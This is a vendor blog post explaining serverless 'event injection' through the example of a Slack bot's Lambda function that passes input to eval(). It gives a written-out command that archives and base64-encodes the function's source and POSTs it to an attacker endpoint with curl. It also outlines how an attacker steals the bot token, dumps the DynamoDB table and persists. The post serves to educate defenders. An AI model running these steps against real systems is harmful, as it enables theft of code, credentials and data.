The OWASP Serverless top ten project was just launched. It aims at educating practitioners and organizations about the consequences of the most common serverless application security vulnerabilities, as well as providing basic techniques to identify and protect against them. The Top 10 project is scheduled for a first, official, release in Q2 2019 and will be based on data collected from real industry input through an open call.

The upcoming report will evaluate the famous OWASP Top ten project risk listing by “running” them through a serverless environment, explaining and demonstrating the differences in attack vectors, defense techniques, and business impact when dealing with serverless.

This is the first in a series of posts in which I will cover known risks, taken from the traditional, monolithic world, as well as new ones. Trying to shed light on this rather new technology by demonstrating them from both the attacker’s and the defender’s points of view.

This post deals with what might be the biggest change and, as such, the most concerning one – injection attacks.

Attacks like SQL Injection, OS Command Injection, Code Injection, and many more are always considered as favorites among hackers since they usually end with a big party on their side. On the “good guys” side, on the other hand, that’s a different story. These attacks are always considered the number one risk, and we usually try to do everything to prevent them. But still, even after at least two decades of monolithic application development, we still hear about big screw-ups allowing attackers to inject malicious code ending with an official press-release apology and few hundred thousand customer records posted on a random pastebin page. So, we never learn.

So OWASP top ten in serverless – what if I told you that protecting against Injection attacks was easier before. Before serverless, injection attacks were (and still are) pretty much the same attack flow. An application processing an input coming from an untrusted source into the application through the network.


While the first part is still true, on serverless “the network” is a more complex term. Serverless functions are usually triggered through events. Events could be almost any service that the infrastructure offers, such as a cloud storage, an email, or a notification.

This means that a part of writing a secure code is that we can no longer trust the security controls we’ve put in place on the network perimeter to do the job for us. And this will always be true. There is no firewall we can put between an email that was received and the function it triggers. This leaves us with code that runs without knowing good or bad, without knowing what happened before, or where it is going. Just code. If the function’s code is vulnerable to any type of injection attack, in the serverless world, it is usually referred to as Event Injection.

Enough with the FUD, let’s see how it really looks.

Consider the following simple serverless scenario in OWASP top ten event injection:

  1. A user interacts with a Slack chat-bot channel
  2. The user message is sent to Slack backends
  3. Slack backend is configured to send the message to the organization API Gateway
  4. The request triggers a set of Lambda functions through the event
  5. One of the lambda functions is used to write the message to a DynamoDB table
  6. And then sends an automatic reply to Slack backend
  7. Which will post the request as the Slack-bot on the designated channel

In our example, the OWASP top ten event injection is possible because the Lambda function that is triggered through the Slack event is vulnerable to code injection. On AWS, the majority of functions run dynamic languages (i.e. Python or NodeJS), which could result in a completely different code running instead of (or together with) the original code. RCE-style.

As you can see the above code (repeatedly found in the wild) uses the eval() function, which we all know (do we?) we should avoid, in order to parse the JSON data coming in the event. However, this is merely an example and risk can arise on any other vulnerable code.

After verifying the vulnerability (any sleep or curl technique will do) the attacker can now start exploiting the serverless environment. It’s true, most of the files inside the environment will not interest the attacker. As such, we can finally forget about /etc/passwd examples. These files belong to the environment container and mostly do not play a significant role in the application. However, there are other areas that will have their mark on them. For example, by having access to the environment, an attacker can steal the entire function code by injection the following payload:

OWASP TOP 10

Let me explain. The _$$ND_FUNC$$_ is the code pattern to treat the data as a function. Since the function is running NodeJS, we we can use require(“child_process”).exec() to execute a new process. This allows an attacker to execute any process that will run on the function container. Without getting too much into AWS Lambda internals, when a NodeJS function is launched, the code can be found on its container, on the running directory. Which means an attacker can simply zip the code into the /tmp (the only non read-only folder in the environment), encode it with base64 and send it somewhere he has access to: tar -pcvzf /tmp/source.tar.gz ./; b=`base64 –wrap=0 /tmp/source.tar.gz`; curl -X POST $l4 –data $b.

The result?

From there it’s no more than a minute to obtain the entire function code:OWASP TOP TEN serverless
Looking at the code, it is possible to see the Slack request in stage #6:


Even though it is not possible to read the environment variable values from the code, an attacker can simply use them as is, since they are part of the environment.

Eventually the attacker can inject a code to modify the behavior of the original bot. In the example below we can see how through a malicious payload an attacker can modify the bot’s avatar and print the original ICON_URL (it goes without saying that stealing the BOT_TOKEN itself, could lead into a partial takeover of the entire Slack account):

It is also possible to inject a code that uses the provider APIs, such as AWS-SDK. This will allow an attacker to interact with any other resource on the account. For example, since the vulnerable function reads from a certain DynamoDB table, the attacker can use use the DynamoDB.DocumentClient.scan() function along with the table data already available in the code, to read from the same table, leveraging the Slack channel to post the retrieved data:

OWASP TOP TEN

However, attacking the serverless function through Slack is only one of the new attack vectors that are now part of our application lifecycle. The same attack can be performed through an email (subject, attachment, or header), an MQTT pub/sub messaging, through a cloud storage event (file upload/download, etc), through queues, logs, code commits, or any other event that could trigger our code.

The impact varies. That’s true, there is no server and therefore, no server takeover. But, while in our example the attacker was able to read code, impersonate a function, leak data from the database and compromise the slack account, other scenarios could lead into a full cloud account takeover, depending on the permissions of the vulnerable function (stay tuned!). If the function is able to access other resources then it’s only a matter of injecting the right code.

So, how should we protect against such attacks? Well, not everything should change. Most of the traditional best practices apply also in serverless. Never trust or make any assumptions regarding input and its validity, use safe APIs, and try to run the code with the least privileges required to perform the task, to reduce the attack surface. Also, developers must still be trained to write secure code. There is no way around that.

However, as humans, we are prone to errors beyond OWASP top ten. Thus, we must find a way to automate things and protect against our mistakes. But how would we do that if there is no ONE PERIMETER to defend?

We believe that a defense control for a serverless environment should be serverless by itself. Otherwise, we lose everything for which we moved to serverless in the first place. A wise man once said that just like we won’t use swords to protect our spaceships, we can’t use old technology to protect new ones. A serverless defense should be ephemeral. It should live and die with the code that it protects.

Protego Labs solution also contains function runtime defense against injection attacks, traversal attacks, XSS, and many more. Now, imagine you could squeeze all this attack scenario I just showed into this:

owasp top ten sls-1

There are other aspects which makes the OWASP top ten serverless injection attack different than the traditional one. Some we have discussed, like the different type of input source, the majority of dynamic languages, and the relevant (and irrelevant) files in the environment. But there are other differences. For instance, serverless functions usually live for only a few seconds to minutes. How would an attack persist in such an environment? A normal attack would definitely last only until the function dies and the attacker would probably have to run a repeated attack that could get noticed. However, there are other ways an attack could persist. One way, is simply keeping the container “warm,” which means that the attacker will cause the event triggers every few minutes just to make sure the container will keep on running. Another way would be to inject a payload to modify the function source code, which I will show on a separate post. This will cause any new container to run with the malicious code leading to a compromised environment.

TL;DR

Don’t panic! Get educated by subscribing to this blog series.


Share This Article
Share on facebook
Share on linkedin
Share on twitter
Share on email
THE SERVERLESS
SMARTS PODCAST
THE SERVERLESS
SMARTS PODCAST

Join industry experts as they discuss all things serverless including industry news and best practice tips.

podcast_image